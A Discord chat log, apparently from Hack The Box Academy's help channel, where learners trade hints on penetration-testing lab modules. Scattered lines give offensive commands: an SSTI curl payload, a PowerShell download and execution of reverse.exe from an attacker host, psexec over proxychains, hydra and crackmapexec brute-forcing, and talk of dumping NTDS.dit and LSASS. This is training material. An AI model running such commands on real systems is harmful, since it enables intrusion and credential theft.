I would not advise using ubuntu

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

You have to tear defender out of the machine if you're gonna build a windows attack VM

^

ok kali it is then cus i have some knowledge of kali

Whichever you're comfortable with

The modules tend to focus on one or two tools and in-depth usage (nmap for example) and use cases (with a few examples)

Also if you buy any number of cubes, you get unlimited pwnbox usage instead of subscribing

i would but i want to learn as i go u know

when i get the fundamentals down

then i might subscribe

The fundamental courses are "free" as in they cost 10 cubes, but refund 10 on completion

So you could do all the fundamental modules (tier 0)

Can I make a suggestion on enumerating pop3/imap with creds? Try evolution

Anyone know how to hack passwords?

For the life of me I can never read emails via command-line

Multiple ways: but I suggest reading #rules

Can someone help with Password Attacks - Hard? I have initial login, but can't crack the password manager. Should I look in a different direction?

Nvm. If using hashcat, always check you're using the right mode...

anyone know the default ssh login credentials?

for dns subdomain enumeration how would you know which wordlist to use given that there are so many?

https://github.com/ihebski/DefaultCreds-cheat-sheet

Hi, I'm in the Tcpdump Packet Filtering section of Intro to Network Traffic Analysis (module 81 section 785) under the Looking for TCP Protocol Flags section. The material explains that the tcpdump filter tcp[13] & 2 != 0 will only display TCP packets with the SYN flag set by counting to the 13th byte and looking at the 2nd bit for a value of 1.

Looking at the TCP header diagram attached, I can see that we're in the 13th byte; however, the SYN flag appears to be in bit 14. How are we determining that bit 2 is for the SYN flag? The picture shows at the top, bits counting from 0 to 31 from left to right, yet if it were bit 2 of the 13th byte, would we be counting from right to left (little endian)?

Running that filter in tcpdump does, in fact, show SYN packets. I'm confused as to how we know it is bit 2.

which do u guys recommend

for kali linux

Can you help me?

VMware Player is fine if you only want to run a single VM at a time. If you want to run multiple VMs simultaneously, choose Virtualbox. Besides that, there is little difference between the two for general usage.

which would you recommend more for a beginner

i am going to be using 1 vm i think atm

im not sure why i would need more

Virtualbox. However, I've never used VMware player due to that single-running VM limitation.

Whichever you find easier to use, try both and choose 🙂

i see for the long run i guess virtualbox will be better cus of no limitations so i might go with it as well

Hey guys I’m new here. I just downloaded the parrot and VMware player to get started on my labs. When setting up the VMware wizard, will my guest operating system be Linux with a Debian 5 64 bit version?

can I dm msg for a personal question

btw Im learning wireshark module

Currently on Attacking Common Services -Hard and When listing user through task mangr || PS it only shows that Fiona is connected...If this is the case how can i find my impersonation targets other than reading the names of the User's folders? I did and basically guessed the 2nd to last question beacuse that are only 3 choices(I was grasping at straws), I have the creds pulled from all of their files w/n the share (thus how i pwned fiona) but now im stuck on the last question @>@

enumerate MSSQL.

also note that MSSQL accounts can be separate from the accounts on the host.

am experiencing a strange issue with Password Attacks Medium lab,cannot ssh,but can cme. Few days ago bruteforced mike and dennis,and downloaded Docs from smb. Cracked two passwords,got jason root. Since yesterday cannot ssh with none of them,either used id_rsa with mike ''sevens",although in my history and notes few days ago I could. Jumping from one question to another am confused,maybe I have to allow the remote access,but throught which user:k,s,d,w,j?Regenerated the VPN ,but nada

for dns subdomain enumeration how would you know which wordlist to use given that there are so many?

A “fierce” one

yo can someone help im trying to install kali on oracle virtualbox and i get this error

@cinder mortar - I think the general thinking is to use "big" list. Seclists has a few, I think there's a good jhaddix one in there. The obvious issue with the "effectiveness" of a wordlist is obviously connected to how many words are in the list. The longer the list, the longer the time.

That said, for CTFs a smaller "raft" list or some of the "dirb" and "dirbuster" lists have tended to be alright.

Has anyone done the file inclusion module? I finished it the other day and I was only able to a shell on 2 of the exercises.

I can get code execution on all of them, which is the point of the modules, but I'm unable to get any kind web shell. Additionally, whenever I try to wget from the machine, the machine resets. So I'm wondering getting a shell is a goal?

That's my issue, logining into mssql is what has me stuck

fixed

@quasi scarab - what'd you do to fix it?

do you have creds?

My Latest failed command => sqlcmd -S SRVMSSQL\SQLEXPRESS -H WIN-HARD -U Fiona -P '4......!........' -y 30 -Y 30

you need to go in ur computers bios and enable virtualizing on ur cpu

@quasi scarab - ohhh! thanks! 😄

your welcome

Yep I pulled them all down to my ATTKR and made a wordlist

i used mssqlclient so i'm not sure if there's an issue with your command

heard ill give that a shot

thanks

@fresh reef - if it works, it might be worth to check what commands the metasploit module runs so we can just run those in the future - there's a lot of interesting msf voodoo

0.0 Heard

Nope didn't work been stuck here for so long lol

What type of hashes is using things like ]\ \\

How can I identify the hash type

there is already a built in tool/app that you can utilize

You could try using hashid

May I DM You 0.0

?

not needed, just click on the windows button of your RDP session and you will find it

I did a while back, and still could not log in

is there an error message when you attempt to RDP into the target?

no Im logged on via RDP

however when attempting to utilize the studio its useless

there is a setting that you must tweak

in order to be able to connect

With in the studio or mangr?

studio

I have no clue what it could be, past switching the auth method...which renders the same errors

https://tenor.com/view/tupac-sad-sigh-gif-13059499

It did not show anything

I tried many website but did not identify this hash

Which module are you doing?

What did you mean here? There is only one server 0.0

........i did nothing different...and now it works 0.0

Attacking Common Services Labs are sus

lol @autumn pilot & @dim wolf thankyou for the help...it was the instance

Iirc, There’s the one you are on, and the sql server itself

Huh? lol I dont doubt it, i just don't get it so the correct server is not WIN-HARD\SQLEXPRESS ?

yo are you only allowed to do one module a month on the silver program, because its not letting me buy another module and I dont see anything on the plan details.

Are you silver monthly or silver annual? If you're silver monthly, you'll get new cubes each month; how many do you have left?

Random question, but does anyone here know how to compile a python script to a Windows 64bit executable.....using pyinstaller....it yields a 16 bit exe which windows refuses to run

sudo pyinstaller --onefile -w get_external_ip.py
Yeilds the 16 bit exe....was hoping for a simple flag or something

Anyone care to help or nudge on Attacking Common Services - hard lab?

nm probably this flag --target-architecture

If this has nothing to do with academy modules go to #bot-commands , verify your HTB account, and post in programming or one of the other txt channels there

awesome thank you

Monthyly I have 140 left and the thing im trying to buy is 10, I do already have another module started that I havent finished

Hello everyone

Just learn GOlang

Can anyone assist a bit with windows pe module ?

Hey, can anyone explain to me why following command is not working smbclient -N -L \\IP\ and the smbclient -N -L ////IP// works ? Whats the reason of that ?

Slashes gotta be right way I think

nvm my ad blocker was messing up the website.

smbclient -N -L \\{TARGET_IP}\
this is the anws from the instruction and its not working on my machine

Backslash is an escape character, so you have to double them up. (I think it's optional for forward slashes.)

You can use // instead

there are 4 slashes but i think on dc only 2 are visible 😄

yeah but I would like to know why its working in such a way

But the case is \\\\Target\\

Are you on the vpn? Are you using the right IP?

yes im on vpn, using right ip, all according to the instruction

someone has done this: ?

Introduction to Bash Scripting
Flow Control - Loops

Got the flag, but it doesnt work 😮 ?

i know solution but i would like to know logic bch that

Any additional spaces in your copy/paste?

no sir.

i can past it here, if its okay

No

so ... ?

Rego over the module and re evaluate your code and what the question is asking

anyone mind giving me a nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) keep getting the ('TypeError: Strings must be encoded before hashing')

hi everyone, almost done with the file upload skills assessment - read the file where we can see where its being uploaded, got the correct extension to bypass all filters, what is the problem now that for any file that i upload i cannot find them..not sure what im doing wrong now, if anyone can give me a hint or some help that would be much appreciated. thank you!

try saving the request into a file and try sqlmap on that file

hint you will need to find a way to read the ||source code|| first

for source code you mean to see how and where the files get uploaded ?

@iron basin @crisp remnant sorry for the ping if you guys got help or got it already but shoot me a dm if you guys still need help with that

I just found an unintended exploit on the skills assessment of Linux Priv Esc

yes the source will will have both of that and one more thing

@vital adder Thank you, I got help. If anyone needs help on the Attacking Common Services labs, let me know.

i found 3

are you free for a quick DM? don

sure

was pk one?

yes and 2 more

once I saw that I stopped looking lol

I was like BINGO root baby

i think me and jarednexgent did have a little chat about that here 🤣

Lol once you're in you don't need to care tbh and the fundamentals stuff I'm sure have multiple vulns

Anyone else getting the error "There are no available instances. Please try again later." ?

I have found that one on other platforms as well. I know I should go back and find the intended way but man if someone opens a door for you, you walk in.

Getting multiple people reporting "There are no available instances" , anybody else?

Yep

been trying to load up one for the past 20mins

just getting the same error, no available instances.

I am trying to work with an instance but it seems to come and go. Can't figure out of it's the VPN connection or the target

does HTB know?

For me "Target failed to spawn :(" 😭

@high zinc are you guys aware of this issue?

or maybe @uneven forum , @tepid arrow, @languid fjord

Contact support on the platform pleas

Still send a message

It opens a ticket

already have, just setting peoples expectations

hopefully they know the impact, about to have 30 students try to do a lab and it's not going to work

sounds like plab B time

Yeah, bedtime.

all the instances are too busy powering my AD experience

So I managed to get it running without saving the request, but not getting the results I’m looking while using the —batch —dump. Going to play with it a bit more after my son goes to sleep

Tip for new people that i've found helpful myself, if you see a command and want it breaking down you should use ChatGPT. (As a last resource if you can't figure it out using "man" or "-help" etc.)

for example

https://explainshell.com/

Hi all. I'm trying to spawn a target instance to complete a module, but I keep getting a target failed to spawn error. I refresh the page as suggested, but it still doesn't work.

We're aware of the issue, unfortunately its being caused by a 3rd party provider.

No worries, thanks for letting me know.

Hi everyone! how you doing? Could anyone drop a hint on the last question of: Skills Assessment Website assessment? Dunno if Am I bruteforcing it right or not

Where are the real ones at?

Is someone free to chat about XSS?

Getting over burnout by playing with sliver

If it's regarding a module; just ask bro. If not verify your account in #bot-commands and post question in relevant channel or in #1024429874246590575

Tried googling sliver game... Did you mean silver? the action rpg?

no lol. I mean sliver the C2

I've had an itch to do some evasion work for a while. Not doing it caused a great bit of burnout

so now im doing it

Defender has been bypassed lol

yeah its regarding the "getting started" knowledge check part. I have been trying for three days to get a shell through a XSS vulnerability. I verified its a vulnerability by creating a popup and also I was able to download a file from a server I set up. HOwever, for the life of me I cant figure out how to get a shell. I found it in a text box that I can submit. I am completely stuck.

XSS dosent usually lead to RCE

oh shit.

More often than not the best thing you can do with XSS is steal cookies from an admin

i already have tge admin login. I guess then I want to have it upload a file into the server which would then create the shell. Okay. I guess I have to find something for that.

Yea. Log in as the admin

try to look for a way to get a shell from there

Getting started; nibbles section yeah?

yeah, got through that now im on the get-simple cms

Mmm

Yeah that one you may be able to use a type of framework tool to grab it

i tried with metasploit, but it kept telling me that it couldnt authenticate.

steal cookies or bypass csrf tokens.

xss can be RCE for some node.js applications however

Did you supply metasploit with the credentials?

True but thats not super common

yup

one sec ill take a screenshot

yeah just something to be aware of

Also as a fundamental module, they aren't expecting you to have the XSS knowledge to access it

yeah thats what i figured but I got stuck and just started googling and found the xss

I had a bit as well. Been doing THM boxes for fun for the last week and a half.

What are the options you have to set for metasploit?

what is the "full uri path to GetSimplecms"

If you do show options with that exploit

What is the section you're on?

getting started: knowledge check

Uri is the http://IP/folder/you're/exploiting

Uri can be used synonymously with URL

okay. I presumed that too but wanted to verify.

There's a couple differences but they're neglible at this stage

Exploit aborted due to failure: no-access: 10.129.224.54:80 - Authentication failed this is the error I get.

does that mean the port is wrong?

What is the port you're accessing the webpage on?

80

Auth failed means that it failed to authenticate the user

Also remember: case sensitive

For user and pass

alright so i have been changing my URI and something different happened: Exploit aborted due to failure: unknown: 10.129.224.54:80 - Upload failed
[*] Exploit completed, but no session was created.

Run check to see if there's something that may be missing

Not at my computer ATM to double check things

alright to 10.129.224.54:80/admin/ is the location of where I sign in as admin. is /admin/ the targeturi? check states: Cannot reliably check exploitability.

Admin.php

Specifically

Check the difference between/admin/ and /admin.php

i tried another exploit on metasploit and popped it.

Thanks for your help

i'm ||dumping the NTDS.dit|| in the AD skills assessment 1 but ||i'm doing it over proxychains|| so it's taking forever......

I dont remember having to DCSync over proxychains 🤔

Oh no, never mind

My notes say otherwise

well the infra froze before the dump completed :)

attempt 2!

Rip

Remember, if you just need a specific user you don't need to dump everything

also working in this recently descovered powershell-empire and have been using it so far so good gott all the powershell tools under one framework and attack platform

Empire is ok. Not my favorite tho

whats your favorite?

C2?

Currently Sliver

thought powershell-empire be very suited for the AD skill asessment sliver got alot of ad stuff in it?

Some. I haven't used it for a ton of AD. But I believe there are a bunch if extensions to load all the common AD tools directly into memory

that was a waste of time.

Lmao. Why?

||all i needed was local admin hash||

Rippp

Hi, can someone help me for Skills assessment of pivoting, tunneling and port forwarding module?
i am at the last question i know the DC is 10.5 but pass the hash is not working
not sure what other thing i am missing

hey i cant connect to the ad module's windows foothold host it keeps showing a black screen and throws this error continously

Press enter a few times, in the RDP window.

It always shows that error, no matter what.

it worked thanks!!

hello, I'm having a bit of trouble with the file upload attacks - blacklist filters part

regardless of what extension I pick to upload my shell it doesn't execute, it just gets displayed on the page

Did you combine both lists they suggested?

i think i only used the seclists web extensions one

There should be 2. If you look at all the screenshots in that module, you should see one with some payloads that you didn't check.

needs som help. currenlty on the medium lab for footprints module. Have been able to access the UI for mssql but unable to connect via the console. it just times out.
Now i'm lost how to navigate in here to find the user?

Anyone? Just a nudge would be nice

you were right, thanks!

can u elaborate more?

basically,
i have pivot all the way to 172.16.10.25
i know that the DC ip is 172.16.10.5
basically i am trying to gain access to 172.16.10.5
i was trying pass the hash but the hashes i gotten from mimikatz do not seem to work

like how do i gain access to the Domain controller
i think the issue i have is the password 😅

u need to dump the lsass

ohh

let me try
my htb ran out so i need re do the pivot

@brisk geode may I dm you?
i still cant get it

sure

hi, any idea why this command fails to replace newlines with single quote space single quote in a text file? sed "s/\n/'\s'/g" payloads_all_the_things_php_ext

could use some help with the whitelist filters part of file upload attacks

nvm

the rdp connection in the modul active directory introduction in the guided labs are not stable. they disconect constantly. in case there is someone online who can forward this to a place where such problems are taken care of

nope, u can't do that lab. it closes so often. not possible.

Hi, I am completing the report writing module in order to pass the CPTS, however I am stuck on the Tmux shortcut question. I know the answer to the question but the formating [key] + [key] + [key] is not acting friendly with me.
Can somebody help please ?

hey guys
what course or document(or book) do you recommend for javascript security(for bug bounty hunting) and practical for hunt?

the answer is 4 keys

still not valid, and this is how I do it usually, can I dm you please ?

yes

hello
SSTI Exploitation Example 1, i have the shell and tried grep -E 'HTB{.*}' $/usr/bin/env.
but no output, any hints?

also tried: curl -s http://<IP><Port>/env/$PATH | grep -e "HTB"

no output

not sure if its me or the service, but i'm attempting a module that wont let me nmap a spawned target

im using a pwnbox vm on my computer that is connected to the academy vpn

when i go to the link in firefox, it takes me to a generic word press page

if you are target is a docker container then you can't ping for scan it

you only have access to the only port the target was given

which module and section are you on?

getting started public exploits

you can only scan a target machine if that target is on a vm which will not give you any port only an ip

also this all you get for this target and you'll need to find a "public exploits"

correct

i was trying to do an nmap scan to get the service so i can look for an exploit

Hi MRtom, yes you're here 🙂 i am at the modul SERVER-SIDE ATTACKS, section SSTI Exploitation Example 1

Hello🏳️‍🌈

oh wait a sec so wtf are you doing with the curl command ?? hint you have to exploit the web site

jarden wrote once he solved it with curl....

oh 🤣 must be an unintended path

i mean tried also with the tplmap.py - OS Shell

i didn't noted down any about that tool for this first example

i do it manually

hello everyone. I need help with shells and payload - the live engagement / host 2. I saw a mentioned exploit on the blog.inlanefreight.local and put it in exploits directory. use it in msfconsole and I am constantly getting error. 1st problem was the rhost, I put the ip of inlanefreight.local ip. And now it says Exploit failed: NoMethodError undefined method `split' for nil:NilClass . I also tried to use burp and change the file from there without success.

oh wait sorry i misread this so you got a shell but having issue finding the flag?

You need to specify vhost

yes

so you can try this command (this is what i got my in note)

grep -irl HTB{ /

and you can add 2>>/dev/null at the end if you are getting to many error also this grep command will start at / to it's going to take a good while

and you can try it in a couple of ||env path|| of course

i will try that. thanks!

I am still getting the same error

I ve tried every ip on ifconfig by the way hahaha

It should be from the 172.16.x.x iirc

Or at least the 172 ip

As the LHOST

Did you also specify the RHOSTS?

This exploit is really weird about it

I put the inlanefreight.local ip

172.16.1.12

The blog one?

yep

I ping the blog and it gave me the inlanefreight.local ip

the weird thing is there is no lhost optiin

hahaha

It should be

there is rhosts and rhost

If you're using the .rb exploit they're expecting you to

I restart the msfconsole

the payload is a bind shell so there is no LHOST

Ah now I remember; check your computer or something for login information

;)

admin:admin123!@#

haha

they are given under hints

Spoiler

But there is another way to get the login creds

I literally copy paste it

I'm stuck at the File Upload Attack Web Assessment. I have to read the source code to find the upload directory. I can't find it. I however found the working upload.php attack file. How can I find the uploads director? I tried fuzzing, but no success.

if you got the source code, read it

So you ve done it with this payload and this payload indeed works right. hahahaha omg I ve spent couple hours and done other hosts within couple of mins. It is really bothering

Yes

i think i got the correct payload, but the response is just a base64 blob image

Double check the image for the attack ip for the blog site

why is it that when i get an error for ||downloading a file on SQL01 with a powershell command, the host can't connect back to my box to download another file and i have to restart the infrastructure|| on the AD attacks skill assessment 2?

almost right try with a different magic number and images extensions also for the upload directory first get the source code and read it

as it turns out, even ||successfully downloading a file will make me unable to download another file||

i'm not sure how to proceed

might just try the ||nishang powershelltcp script|| instead

Hey, i'm currently working through the linux fundementals module, i'm on the service and process management section and i'm trying to find the answer for the page, the question is

"Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer."

So i'm running

systemctl | grep load

But there are no results with that answer in the description, can someone point me in the right direction?

it looks like you're not SSH'd into the target

i've tried other words too, snapd etc

ohhhhhh my god

what a clown

i just realised i closed the terminal, but didn't SSH back into the target

thank you

i'm going to have a short nap after this LOL

so you have a shell on the target machine but can't download file?

i'm using ||xp_cmdshell|| and if i download something with ||Invoke-WebRequest|| it will not download another file again

i'm trying to do ||IEX|| rn

just use wget 🤣

isn't wget just an alias though?

not if you use it with powershell (so powershell wget)

powershell -c "wget ..." ?

not sure about that i just use powershell wget (my ip / file) and an -o at the end to output the file

*with a name of course

well the command worked

but it's not downloading the file

it kinda just.. hangs

and did you give it an output location?

there is no output

not even a NULL

i mean in the command

yes i gave it an output location

if is hanging try running the shell

but basically this is my command

(spoiler) powershell wget 172.16.7.240:8000/reverse.exe -o "C:\Windows\Temp\reverse.exe"
(spoiler) "C:\Windows\Temp\reverse.exe"```

could anybody give a small nudge on the file upload attacks skill assessment?

I'm trying to read the source code of the website but for that i need a directory name (ie /var/www/html/directory/yaddayaddayadda) and I can't really figure it out

or maybe I'm going the wrong direction?

i guess i should have gotten a shell onto the host first instead of trying to download more than one file using xp_cmdshell

thanks

anyone mind giving me another nudge on sqlmap essentials Bypassing Web Application Protections What's the contents of table flag10? (Case #10) figured out my problem i was having with the ('TypeError: Strings must be encoded before hashing') but now im stuck trying to retrieve the flag. I can dm my command for review.

sure you don't have a trailing space from copy pasting the flag?

dm me the flag you found

still could use a nudge for the file upload attacks skill assessment

I wasn't asking you in particular I'm asking the server in general

is this a markdown typo ? XD shells and payloads > inflatrating windows

@unique valve

Ah yes it does look like theres a period there between here and the url. Would you mind posting that in #858470491676737536 too?

i'm not the server but that's the issue?

lol nevermind I have progressed, I am now trying to understand what I don't understand in some seemingly very simple php code

i did linked a w3schools page (for the php code part) a while back but i don't have the link save for some reason

if you are having issue with php they should have something that you can play with

i think i figured out the php

but i uploaded an image to give it a whirl and when i try to visit it using the naming convention I understood it doesn't seem to work, so I must have something wrong somewhere

i'm stuck in the last part of buffer overflow linux, i can change te eip to x66666666 but i'm doing something wrong that i cannot get the reverse shell.
Someone could help me?

here found my old link https://www.w3schools.com/php/phptryit.asp?filename=tryphp_date1

can i shoot you a quick dm?

sure

Having a lot of issues with the instances and targets on academy today, anyone else? trying to ssh to the target and just getting stuck with nothing, then refresh it and it says the ip isn't recognised etc

i had no trouble an hour ago but i'm in US

it'

it's working again now, but yeah been having some issues all day just being a bit funky

so its happening again, suddenly it won't let me type in the terminal but i can scroll up and down, so i close the terminal try and ssh again but just get stuck here

have to terminate the session and start it again

annoying because i only get a couple hours a day to do this and both yesterday and today the instances been plagued with issues.

if any other command worked fine and just the ssh command hang then the issue is on the target machine and because your ssh command can't connect it's just don't know that to do and hang

if anyone has any explanation as to why the .||png|| extension doesn't work for the file upload attacks skill assessment and can enlighten me I'd be very grateful

cuz considering the filters in place it should work

Could use some help. I'm stuck at Password Attacks - Pass the Ticket from Linux.

I'm unable to get the credentials of the user svc_workstations. I tried to crack his AES-256 hash with crackstation, rockyou, password.list, custom.rule, etc. I get absolutely nothing. What am I missing here?

what mode are you using for cracking the password?

^

hii'm new here

@obtuse leaf Hi Welcome to HTB.

Thanks🥰

-a 0 -m 1400

does the hash that you have saved corresponds to that mode?

hello

Yes. But it seems i need to extract the hashes from a different keyfile. Brb, gotta try a few more things.

+1

#rules ; this channel is for talking about and discussing modules found on https://academy.hackthebox.com; off-topic conversations go in #general which you'll need to verify your htb main account over in #bot-commands on ( https://app.hackthebox.com )

I've figured it out. You don't need the svc_workstations keytab but the keytab from a different user.

👍

Firewall and IDS/IPS Evasion - Hard Lab . I keep seeing the same 2 ports coming up with no other services. I have tried aggressive scanning and only get 2 options of services.

try a wider scan; this lab can be a pain at times because the port it wants you to check is a pain

I keep getting the same 2 TCP ports even when scanning all ports

have you tried different scanning methods (-sS, -sT, -sU, -sA

all of them, I still get only the same 2 ports, it takes about 10 min to complete each one as well. I have tried resetting the target to see if maybe there was an error

sec let me rerun this to see if there's something i'm forgetting

hello . does anyone know how to insert a function that deletes all the data available in an excel file after certain amouint of time

as this is not a module related question; you should ask in #1024429874246590575 or verify your https://app.hackthebox.com account in #bot-commands and post in #programming to see if you get an answer

need some help with: Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

**Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. **

╰─ proxychains psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/administrator@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -k -dc-ip 172.16.5.238                                                           ─╯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.5.238:88  ...  OK
[-] K||erberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)

Just let me know if I am on the right track. I ran an ||NMAP scan and know that 88 and 445|| is open so I am pretty sure psexec should work.

"KDC_ERR_WRONG_REALM"

with python Write the function signature (def ...) for a function "foo" that has one argument "bar", including the trailing colon. My answer = def foo(bar:): .... can somebody tell what is wrong??

@fathom pendant I think I found my response after reading the instructions again

it's not saying you're wrong it's just that where you're trying to go isn't in use

Yay! Finally got around to finishing Windows Privilege Escalation 😄

but also thanks for reminding me I needed to revisit that as I, for some reason, do not have notes on that lab

if you want to DM me the scan you ran/output as I just did a scan and got the expected output go for it

is psexec that right path or should I be looking else where?

I'm just reading the error it's providing ¯_(ツ)_/¯

it says "reserved for future use" so idk

wrong realm... check the dc ip flag.

SERVER-SIDE ATTACKS , SSTI Exploitation Example 1, i don't get it....where is the flag? once when i have the shell with tplmap,
why does this commands nothing show: grep HTB $PATH or grep HTB $HOME

Any body don't know?

you might want to ask in another channel

#web

curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("HTB*{")}}{{_self.env.getFilter("id;uname -a;hostname")}}' IP:PORT

nothing

if somebody has the solution, just dm me please 😉

i would apreciate it

I could use some help on the DNS info gathering. im not sure which ip address the first question is asking for i found a few of different subdomains and there doesnt seem to be a www. subdomain

I ended up figuring it out. stupid oversight on a mistake. Got the flag... Thanks

You can ask in #1024429874246590575 or verify your hackthebox account in #bot-commands and post your question in #web and someone may be able to answer. As this channel is for questions pertaining to the modules found on https://academy.hackthebox.com any non-academy related questions will generally be ignored here

HTB Academy - File upload attacks - Skills Assessment - Totally stuck. Trying to read upload.php but I only see base64 encoded text of the image I uploaded.

ok update. the question asking for paydiant.com IP is not working at the moment. seems the site is down.

lol. once again 3 hours no progress. sometimes hack the box is just frustrating...

if you have shell, my go to flag hunt out of frustration is grep -R HTB / 2>/dev/null

assuming the flag format is indeed HTB

if it isnt they usually give you the filename to look for

Hi all,
I'm in the Password Attacks module, Password Mutations section. I have made a list using Hashcat using the password.list and custom.rules from the resources .zip file like this: ||hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list||. Then used ||crackmapexec ssh 10.129.235.57 -u sam -p mut_password.list to brute force the login.|| It has been running for more than 30 min now, indicating that i did something wrong. Can someone give me a hint please?

That section legit can take 30-45 minutes to finish

also ssh is the slowest service to crack, youll be better off finding a faster one

Whoa ok, will try FTP i guess. Thanks a lot!

Hello can I have some help with windows fundamentals?

i have no shell, If you are asking me

Im want to create a new user for windows fundamentals.

Ive only ever created users through start and havent done so in powershell in a long time.

Can some one help me.

Net user add

I think

no output till now....

Is that for me?

Lets take this to my post.

lol, i wanna have my 3 hours back

as in, did it work? lol

hack the box is good. but this part from hack the box is in my opinion just bad. what did i gain from my 3 hours, nothing than frsustration, i learned nothing... I mean i work the whole week and in the time i have, i want to learn something....

no sorry did not work..maybe i do soemthing wrong on another end...

In the question they say the answer is in an environment variable. ||Try the command printenv||

ah well there ya go

if they say the flag is an env var than searching the filesystem wont be useful

i did.

you learn the most when you spend three hours making mistakes though

once you figure it out you probably won't mess up again

I like how vague HTB questions can be

is this shell from a newly launched process? maybe it didnt inherit the environment properly. Try using your original injection to run the env command and check its output.

Pretty random, but recently my instagram got hacked and they started promoting bitcoin etc in my name and posting stories and posts etc.
I was just wondering if anyone here knows somehow how to get back into that instagram account. Big ask, but if anyone can do this it will be much much appreciated.
Dm me

No

this is for academy discussion

go away

Contact instagram support

They don't have customer support/service sadly

not our problem

keep the channel on topic

i'm stuck in the last part of buffer overflow linux, i can change te eip to x66666666 but i'm doing something wrong that i cannot get the reverse shell.
Someone could help me?

try the curl example to run the command instead of tplmap

I just did it and it works

can i dm you?

Yes

I'm stuck on the module WINDOWS PRIVILEGE ESCALATION. Especially on the section "Windows Privilege Escalation Skills Assessment - Part I".
I succeed to perform a privesc to get SYSTEM, but I can't find the answer to one of the question:

I tried to find files that contains 'ldapadmin', I tried to look for .sqlite files, I tried lazagne, snaffler. But nothing. Can someone help me?

i need some help with AD attacks skills assessment 2. i need a stable way to transfer files over to a host because every time i choose to use powershell to download files from my attack host to the sql server, the sql server has a random chance to just hang and i need to restart the infra. tried SMB shares which got blocked by the policy, and the host can't find my webdav server.

going to try living of the land next

General question for folks going through the modules. Are you taking notes on, well, practically everything? I always feel a strong urge to write every example command down for example. I know tons of this stuff can just be googled, but not sure how I'd remember that, *oh I can use seatbelt for windows enumeration *

well, for the commands part, even though, I havent started yet. I am going to create another notes just for commands divided by sections

I am thinking about taking the cpts that's why

I guess the answer is it is all about your goals

Yep that is sort of what I am doing. I took one of the cheatsheet.md files provided and started adding onto it... actually created a private repo that I've also started putting things into that might be helpful to clone to another machine.

I figure this way. I can just clone it whenever I need it, has all my notes and useful scripts I might need.

It is a lot easier to check your notes rather than google, especially when you know where to look. But, Sometimes it is the other way around. Some of my notes really messy

100% agree... I think that might be what I struggle with most at this point... I think what I'm going to do is just try and have general categories and then applicable notes for those... once I complete the course and before the exam I will organize everything correctly so it's easier to navigate.

I tried ||hydra -l sam -P mut_password.list ftp://10.129.139.13 -V|| and ||crackmapexec smb 10.129.234.160 -u sam -p mut_password.list|| but the host times out before the password is found. If i wc mut_password.list i get 94.044 lines. Is that correct?

Yes, extremely extensive notes and then reorganizing and restructuring notes once new stuff comes into play. It's a very time consuming process imo, but it does seem to work.

Yes

very glad I am not the only one 🙂

You can cut the first 17k lines and should get it

https://twitter.com/hackthebox_eu/status/1621546585212461056?t=0CFvC-IPJcSfdOIFz6dnaA&s=19

Which module? If i remember correctly focusing on B************

What is the purpose of this section? 😂

Password Attacks module, Password Mutations section. I made it past B in the SMB run, all the way to chocolate99

Example of mutating passwords to common variants using a set of rules

I'll have to check my notes tomorrow and then I give you a good hint, if you're still stuck.

Haha yeah, i get the concept, now let me get the flag! XD

Also you can manipulate how many threads hydra can use

Password Attacks - Network Services: I am trying to answer the last question. Medusa and hydra fail to work properly with smb, only option I have is msfconsole smb_login module. I run the module with appropriate options and use the password list provided. Before module can complete the box times out. Any help or nudge?

Thanks man! I appreciate it 👍

Try adding -t 64 to your Hydra command

sql01, why must you do this to me....

Awesome, will try that 👍

hah, SSTI Exploitation Example 2, I solved in 30 minutes. this is balm for my soul😂

Regarding this question Can I inbox anyone ?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

Footprinting > DNS

Subdomains of subdomains

I solved it but I have some question

just ask your question here

I found the subdomain by accident.. It didnt showed up in my initial search

xxx.inlanefreight.htb

So doing a dig any <ip> didn't show you anything?

anyone give me a nudge on AD attacks skills assessment 2? - Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I found the following

How about a records

NVM, finally got it to work.

Or zone transfer

Can I get some assistance with module: password attack lab - hard?

https://dontasktoask.com/

oh nvm

I found it

Thanks @fathom pendant

+rep

Since this contains a flag please remove it

Hello there! I am working on the final section of the Login Brute Forcing model. The question implies I should have information about the target company, specifically the name of an employee, but I do not see such information in the section. Am I missing something?

I might be confused, The way the section talks about the task, I assumed the target IP/port would have been a webserver where I would find the relevant information. Instead the target is SSH

previous sections information

its really dumb

Ah! Thank you @thorn urchin

Maybe they should add a note to reference the previous section

I'm in the Information Gathering - Web Edition and having issues with Virtual Hosts section. I can only get the first question answered. I found some hints in the forum, but so far nothing has worked. Any ideas why Fuff is only giving errors?

Hi guys, did anyone get stuck with File Transfer linux side?

I'm supposed to hash this text "048090bc7ed04f758658975df8f862c8" through "hasher" and it gives me 1219923e466ff7d194dc99a99da5b791 but the module does not accept it...

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.

Also... one question, if I spawn a VM on HTB, I can't download the VPN and connect via my Kali VM? I tried to "switch" but it didn't regenerate a new VPN and remove the previous hosts

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.``` 😦

